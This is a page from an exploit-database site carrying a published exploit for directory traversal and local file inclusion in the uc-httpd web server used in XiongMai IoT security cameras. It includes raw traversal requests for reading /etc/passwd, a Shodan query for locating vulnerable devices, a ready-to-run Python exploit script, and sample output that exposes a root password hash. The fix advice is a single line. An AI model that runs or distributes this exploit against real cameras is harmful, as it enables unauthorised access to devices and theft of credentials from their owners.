0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

uc-http Daemon - Local File Inclusion / Directory Traversal Vulnerabilities

Author

keksec

Risk

[

Security Risk High

]

0day-ID

Category

Date add

Platform

'''
______  ______   _____     ___   _____   _____   _____
| ___ \ | ___ \ |  _  |   |_  | |  ___| /  __ \ |_   _|
| |_/ / | |_/ / | | | |     | | | |__   | /  \/   | |
|  __/  |    /  | | | |     | | |  __|  | |       | |
| |     | |\ \  \ \_/ / /\__/ / | |___  | \__/\   | |
\_|     \_| \_|  \___/  \____/  \____/   \____/   \_/
 
 
_____   _   _   _____   _____   _____   _   _  ______   _____   _____  __   __
|_   _| | \ | | /  ___| |  ___| /  __ \ | | | | | ___ \ |_   _| |_   _| \ \ / /
| |   |  \| | \ `--.  | |__   | /  \/ | | | | | |_/ /   | |     | |    \ V /
| |   | . ` |  `--. \ |  __|  | |     | | | | |    /    | |     | |     \ /
_| |_  | |\  | /\__/ / | |___  | \__/\ | |_| | | |\ \   _| |_    | |     | |
\___/  \_| \_/ \____/  \____/   \____/  \___/  \_| \_|  \___/    \_/     \_/
 
 
[+]---------------------------------------------------------[+]
| Vulnerable Software:      uc-httpd                        |
| Vendor:                   XiongMai Technologies           |
| Vulnerability Type:       LFI, Directory Traversal        |
| Date Released:            03/04/2017                      |
| Released by:              keksec                          |
[+]---------------------------------------------------------[+]
 
uc-httpd is a HTTP daemon used by a wide array of IoT devices (primarily security cameras) which is vulnerable
to local file inclusion and directory traversal bugs. There are a few million total vulnerable devices, with
around one million vulnerable surviellence cameras.
 
The following request can be made to display the contents of the 'passwd' file:
GET ../../../../../etc/passwd HTTP/1.0
 
To display a directory listing, the following request can be made:
GET ../../../../../var/www/html/ HTTP/1.0
The above request would output the contents of the webroot directory as if 'ls' command was executed
 
The following shodan request can be used to display vulnerable systems:
product:uc-httpd
 
Here is a proof of concept (written by @sxcurity):
-------------------------------------------------------------------------------------------------------------
'''
#!/usr/bin/env python
import urllib2, httplib, sys
 
httplib.HTTPConnection._http_vsn = 10
httplib.HTTPConnection._http_vsm_str = 'HTTP/1.0'
 
print "[+] uc-httpd 0day exploiter [+]"
print "[+] usage: python " + __file__ + " http://<target_ip>"
 
host = sys.argv[1]
fd = raw_input('[+] File or Directory: ')
 
print "Exploiting....."
print '\n'
print urllib2.urlopen(host + '/../../../../..' + fd).read()
 
'''
-------------------------------------------------------------------------------------------------------------
 
Here is a live example of the exploit being ran:
 
 
root@127:~/dongs# python pwn.py http://127.0.0.1
[+] uc-httpd 0day exploiter [+]
[+] usage: python pwn.py http://<target_ip>
[+] File or Directory: /etc/passwd
Exploiting.....
 
 
root:absxcfbgXtb3o:0:0:root:/:/bin/sh
 
root@127:~/dongs# python pwn.py http://127.0.0.1
[+] uc-httpd 0day exploiter [+]
[+] usage: python pwn.py http://<target_ip>
[+] File or Directory: /proc/version
Exploiting.....
 
 
Linux version 3.0.8 (leixinyuan@localhost.localdomain) (gcc version 4.4.1 (Hisilicon_v100(gcc4.4-290+uclibc_0.9.32.1+eabi+linuxpthread)) ) #52 Fri Apr 22 12:33:57 CST 2016
 
root@127:~/dongs#
-------------------------------------------------------------------------------------------------------------
 
 
How to fix: Sanitize inputs, don't run your httpd as root!
 
[+]---------------------------------------------------------[+]
|                      CONTACT US:                          |
|                                                           |
| IRC:          irc.insecurity.zone (6667/6697) #insecurity |
| Twitter:      @insecurity                                 |
| Website:      insecurity.zone                             |
[+]---------------------------------------------------------[+]
'''

#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

uc-http Daemon - Local File Inclusion / Directory Traversal Vulnerabilities

Report Error

Report Error